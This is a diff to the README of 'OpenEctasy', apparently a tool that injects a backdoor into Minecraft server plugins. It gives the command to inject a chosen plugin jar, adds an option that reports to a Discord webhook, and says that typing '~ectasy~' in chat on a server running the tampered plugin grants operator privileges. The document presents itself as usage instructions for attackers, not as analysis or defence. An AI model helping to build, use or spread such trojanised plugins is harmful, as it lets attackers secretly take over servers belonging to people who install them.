Body-Alhoha/OpenEctasy/README.md

 Inspired by <a href="https://github.com/VoxelHax/OpenBukloit">OpenBukloit</a>

 ## Injecting
-Download `injector.jar` from the [latest release](https://github.com/Body-Alhoha/OpenEctasy/releases/latest) and put it in the same folder as the plugin you want to inject, then open a command prompt and type the command `java -jar injector.jar <file>`
+Download `injector.jar` from the [latest release](https://github.com/Body-Alhoha/OpenEctasy/releases/latest) and put it in the same folder as the plugin you want to inject, then open a command prompt and type the command `java -jar injector.jar --input <file>`

+## Discord Webhook
+You can use the argument `--webhook <link>` to add your discord webhook.
+Example : `java -jar injector.jar --input HD.jar --webhook (link)`

 ## Usage
 Once the plugin is enabled on a server, type `~ectasy~` in the chat, to automatically gain op privileges.